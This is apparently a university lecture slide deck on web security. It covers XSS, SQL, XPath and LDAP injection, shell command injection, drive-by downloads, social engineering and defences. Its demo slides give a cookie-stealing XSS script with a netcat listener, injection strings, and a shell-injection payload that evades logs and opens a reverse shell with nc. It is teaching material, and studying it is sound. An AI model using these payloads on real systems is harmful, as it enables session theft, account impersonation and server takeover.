1. Web Security

2. Objectives
Understand the complexity of Web infrastructure and current trends of Web threat
Understand the mechanisms and defense of major Web attacks: XSS, SQL injection and shell attacks

3. Why Web Security: a Real Business Problem
> 60% of total attack attempts observed on the Net are against Web applications
> 80% of vulnerabilities discovered are in web apps
Independent security audit
Regulatory compliance
* SANS/TippingPoint, based on March-August 2009 data

4. Auditor finding Freeform edit box XSS issue raised
Message to Customer Service
XSS issue raised
Must provide a response:
Prove issue to be a non-problem or
Describe actions to take

5. Anatomy of Web Attacks
Attacker breaks into a legitimate website and posts malware
Malware is no longer exclusive to malicious Web sites.
Attacking end-user machines.
Malware on a Web site makes its way down on to a user’s machine when that user visits the host Web site.
“Drive-by-download” – happens automatically with no user interaction required
Additional techniques which do require some input from the user, but in practice are equally, if not more so, effective.
Leveraging end user machines for malicious activity.

6. Anatomy of Web Attacks
Source: Web Based Attacks, Symantec 2009

7. Web Applications Big trend: software as a (Web-based) service
Online banking, shopping, government, etc.
Cloud computing
Applications hosted on Web servers
Written in a mixture of PHP, Java, Perl, Python, C, ASP
Security is rarely the main concern
Poorly written scripts with inadequate input validation
Sensitive data stored in world-readable files

8. Typical Web Application Design
Runs on a Web server or application server
Takes input from Web users (via Web server)
Interacts with back-end databases and third parties
Prepares and outputs results for users (via Web server)
Dynamically generated HTML pages
Contain content from many different sources, often including regular users
Blogs, social networks, photo-sharing websites…
Web advertisements, usually third party
A webpage can have content coming from different domains

9. Chicago Tribune Home Page

10. Two Sides of Web Security
Web browser (front end)
Can be attacked by any website it visits
Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data
Web application (back end)
Runs at website
Banks, online merchants, blogs, Google Apps, etc.
Written in Javascript, PHP, ASP, JSP, Ruby, …
Many potential bugs: XSS, SQL injection, XSRF
Attacks lead to stolen credit cards, defaced sites, etc.

11. How Are Legitimate Web Sites Compromised?
SQL Injection Attacks
Cross-site scripting (XSS) attacks
Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)
Malicious Advertisements
Many Web sites today display advertisements hosted by third-party advertising sites
Volume of ads published automatically makes detection difficult
Random appearances further compounds the detection
Search Engine Result Redirection
Attacks on the backend virtual hosting companies

12. We need application layer protection as well!

13. JavaScript Language executed by browser
Scripts are embedded in Web pages
Can run before HTML is loaded, before page is viewed, while it is being viewed or when leaving the page
Used to implement “active” web pages
AJAX, huge number of Web-based applications
Many security and correctness issues
Attacker gets to execute some code on user’s machine
Often used to exploit other vulnerabilities

14. Cross Site Scripting Attacker goal: their code into browser
XSS forces a website visitor to execute malicious code in his/her browser
Count for roughly 80% of all documented security vulnerabilities

15. XSS Risks XSS abuses render engines or plug-ins Steal browser cookies
Steal session info for replay attack
Malware or bot installation
Redirect or phishing attempt

16. XSS Example 1 Trudy posts the following JavaScript on a message board:
<script language="javascript">
var url = " encodeURI(document.cookie);
</script>
Then run a TCP server listening on port 5000 with e.g., nc –l 5000
When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy
Same principle applies to RSS/Atom Injection where feed content is supplied by client
RSS is a family of web feed formats used to publish frequently updated digital content, such as blogs, news feeds or podcasts.
The initials "RSS" are variously used to refer to the following standards:
Really Simple Syndication (RSS 2.0)
Rich Site Summary (RSS 0.91, RSS 1.0)
RDF Site Summary (RSS 0.9 and 1.0)

17. Web Attack Demo Flow Chart
(dod)

18. XSS Demo Instructions Set port forward to bypass the firewall
ssh -L 9000:netsec-demos:2000
Note: 9000 is the local port, it's forwarded to netsec-demos port 2000 through hamsa proxy
Use to access

19. XSS Demo Instructions (II)
Login as ychen and post the script with a sexy title (e.g., hot game!)
<script language="javascript">
var url = "
url = url + encodeURI(document.cookie);
new Image().src=url;
</script>
Hi Everyone! Thanks for your cookies!
Ssh to that machine (dod.cs.northwestern.edu) and run nc –l –p 5000
For multiple students to test together, need different port numbers

20. Simple XSS Code
var url = " encodeURI(document.cookie);
document.cookie is the browser's entire cookie for the current website
encodeURI() is a javascript function to hex-encode certain characters to be included as part of a URL
E.g., changing the space character to %20
Make the URL less suspicious

21. What can Trudy Do with the Cookie?
Another user test458 login as and when clicking the post, cookie is sent to the attacker
Crack Bob’s password (MD5 hash in the cookie) with John the Ripper, Hydra, or any password cracker
For more info,
Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bob

22. XSS Detection
A client usually is not supposed to send scripts to servers
If the server receives <SCRIPT>… or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet, then an attack has occurred
A sanitized script could look like &ls;SCRIPT>…
Any user input must be preprocessed before it is used inside HTML

23. SQL Injection
Malicious SQL statements run on a database and thus attack the server
XSS can only target other users

24. SQL Injection Example
Trudy accesses Bob’s website; in which he does not validate input on his sign in form
Runs a SQL statement like the following:
select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe’;
Set username to ' or '1'='1
select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1’;
Effect: picks any row where the username is blank and the password matches or any row where true.
Add “limit 1” to pick the first row
In the password field, she types as her password:
X” OR “x”=“x
Manipulates the server into running the following SQL command:
SELECT * FROM ACCOUNTS WHERE username = “USER_NAME” AND password=“X” OR “x”=“x”;
Selects all account information

25. SQL Injection Detection
Input validation on any outgoing SQL statements from the web server to the database server
Filter
Apostrophes, semicolons, percent symbols, hyphens, underscores, …
Any character that has special meanings must be escaped, .e.g., convert ’ into \’
Only works for string inputs
Different databases have different rules for escaping
Check the data type (e.g., make sure it’s an integer)

26. Control an actual machine like a web server
Shell Attacks
Control an actual machine like a web server

27. Shell Attacks Inject commands into scripts that use Linux utilities
E.g., with “;” as command separator in UNIX/LINUX
CGI programs like perl can use command-line programs (e.g. grep, ls)
Unsanitized input as arguments can lead to command execution.

28. Shell Attacks Demo Search engine in MiniBB webserver executes
system("echo $user_usr " . $phrase . " >>/tmp/searchlogs");
Put phrase as: >/dev/null; id; echo randomdata
Hide user ID
Store random data in logs to evade detection
We can even get a remote shell !
>/dev/null; nc dod e /bin/sh

29. Defense Approaches Web firewall/IDS Static code analysis
ModSecurity for Apache
Commercial: SecureSphere from Imperva
Static code analysis
Open source: Nikto
Commercial:
Acutenix Web Vulnerability Scanner
N-stalker
Education on good coding
HTML encoding on input (server-side)
Input validation/filtering

30. XSRF

31. Discussion of Symantec White Papers:
GETTING ONTO A USER’S COMPUTER
(AUTOMATICALLY)

32. GETTING ONTO A USER’S COMPUTER
Source: Web Based Attacks, Symantec 2009

33. Drive-by Download Attacks
Techniques used to deliver malware from Websites to a users computer.
Exposure
Browsing a website
No user interaction is required
Executable content is automatically downloaded
Exploit the browser’s vulnerability

34. “Click Jacking”

35. GETTING ONTO A USER’S COMPUTER (WITH A LITTLE HELP FROM THE USER)

36. Social Engineering
People are tricked into performing actions they would not otherwise want to perform
Source: Web Based Attacks, Symantec 2009

37. Types of Social Engineering Attacks
Fake Codec
Malicious Peer-to-Peer (P2P) Files
Malicious Advertisements
Fake Scanner Web Page
Online Social Networks (OSN)/Blog Spam
Other Attack Vectors
Spam
Pirated software

38. Fake Codec User is prompted to install a missing codec
Codec is actually malware code
Usually a trojan horse

39. Malicious Peer-to-Peer (P2P) Files
Malware authors bind content into popular applications
Files named after celebrities, popular bands
Uploaded to popular P2P sites where they are downloaded by unsuspecting users
Openly available how-to materials on the internet
Details how to build and distribute malware
Pay-Per-Install malware

40. Fake Scanner and Pirated Software
Create a web site or product that misrepresents the truth
JavaScript pop-ups notifying of false need to install operating system updates
Tools that claim to scan for and remove adult images, etc.
Source: Web Based Attacks, Symantec 2009

41. Online Social Networks (OSN)
Among world’s most visited websites by Alexa 2
1.35 billion monthly active users by Jul 2014 10
284 million users by Oct 2014
Online social network has become extremely popular among Internet users.
According to Alexa,
Facebook is the 2nd most visited website,
2. Twitter is the 10th most visited website,
3. LinkedIn is the 14th most visited website,
With tremendous popularity, online social networks have also attracted attackers. In this study, we target the spam problem. 14
332 million users by Nov 2014 41 41

42. Scary OSN Spam Stats
billion tweets posted to Twitter every day are spam
percent of Twitter’s user base is bots and spam bots 42 42 42

43. OSN Spam and Defense
1. All commercial Osns adopt client-server architecture. The users interact with each other through well-defined interfaces, and the service provider mediates all interactions.
2. However, not all users are necessarily benign. Suppose we now have a bad user, A, and a legitimate user, B.
3. A sends a spam message to user C, while B sends a legitimate message to user D. In this example a message always has one sender and one receiver. Nowadays a popular way of using a social network is to broadcast a message. For example, messages in Twitter are broadcast to all followers. For simplicity, we treat a broadcast message equivalently as a message sent to each of the recipients.
4. Next, the service provider receives the message and waits for the recipients to sign in.
5. Once the recipients sign in, the service provider renders the messages to them. D receives a legitimate message. It’s fine. C receives the spam and is exposed to various kinds of fraud.
6. Our goal is to design an online spam filter to deploy as part of the OSN platform. It inspects every message before the message is rendered to the recipient. 43 43

44. How to Protect Yourself
Client Side
Update and Patch Software
Get latest OS, Browser, Application patches
Browswer Plug-in updates often forgotten
Endpoint Protection Software
Anti-virus software for signature based detection and behavioral monitoring
Update Protection Software Subscription
Be Suspicious
Avoid things that seem too good to be true
Adopt Strong Password Policy
Server side: Web Application Firewall (WAF)
By way of example, consider that
Symantec currently delivers protection for well over 10,000 new virus samples each day. A week of not updating would mean that a user
is missing protection for 70,000 new unique virus variants.

45. Summary
Complexity of Web infrastructure and current trends of Web threat
Mechanisms and defense of major Web attacks
XSS
SQL injection
Shell attacks
New Web attack trends in Symantec white paper

46. Backup Slides

47. Existing Systems Comparison
Content-based/URL-based
Dynamic/Static
Training Set
Input
Output
IronPort
Both
Mixed
URLs from 100,000 Orgs
URL
Malware, Phishing, and Spam
Safe Browsing
Content-based
Dynamic
N/A
Malware and Phishing
Web of Trust
URL-based
Static
User Comments
Trend Micro Web Rep
Not Public
McAfee

48. Intelligent Cloud Network
Web Reputation Agent
Web Sandbox
(Dynamically executing WebPages )
URL Classification
Engine
Crowd Sourcing Engine
Phishing Detection Engine
Result Processing Center
Webpage Static
Detection Engine
Intelligent Cloud Network
Web Reputation Agent passes URLs to four fast detecting engines: Crowd Sourcing, URL Classification, Phishing Detection and webpage static engines.
These four engines are lightweight and therefore they can detect very fast.
These four engines return the scores to Result Processing Center (RPC), which standardized the four scores and generate a final score.
If the final score strongly indicates the URLs are legitimate or malicious, RPC returns the score to Web Reputation. Otherwise, RPC passes the URLs to Web Sandbox, which is a heavyweight detecting engine and will detect the URL by executing the contents in the URL.

49. XSS Example 2
Trudy sends a link of the following URL to Bob that will take him to a personalized page:
A page is returned that contains the malicious script, and Bob’s browser executes the script causing his session cookie to be sent to Trudy
Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

50. XPATH Injection Example
Similar to SQL injection
Bob has a form that does not sanitize user-provided input before using it as part of an XPATH query::
string(//user[name/text()=’USER_NAME' and password/text()=’USER_PASS']/account/text())
Trudy again can provide the following password to change the statement’s logic:
X’ OR ‘x’=‘x
The statement thus selects the first account

51. LDAP Injection Example
Server using LDAP for authentication
User name initialized, but then uses unchecked user input to create a query
filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
Attacker can exploit using special characters

52. LDAP Injection Detection
Detection is based off of usage of special LDAP characters
System monitors input for special characters
Either scrubs incoming input or watches for unescaped output passed to database server
Detection approach is blackbox

53. SSI Injection Example
Bob has his server configured to use Server-Side Includes
Trudy passes input with an SSI embedded
<!--#INCLUDE VIRTUAL="/web.config"-->
SSI inserts malicious code into normal webpages upon next request
Future legitimate users get content containing the tainted code included by the SSI

54. JSP Injection Example Similar to SSI injection
Bob has a portal server configured to use dynamic code for templates
Trudy passes input with an embedded <jsp:include “ >
malicious code inserted into webpage

55. JSP Injection Prevention
Prefer static include <%include …>
Don’t allow file inclusion outside of server via Java2 Security policies
Firewall rules to prevent outbound requests from server
Input validation coding
Choose portal software not requiring dynamic includes or code execution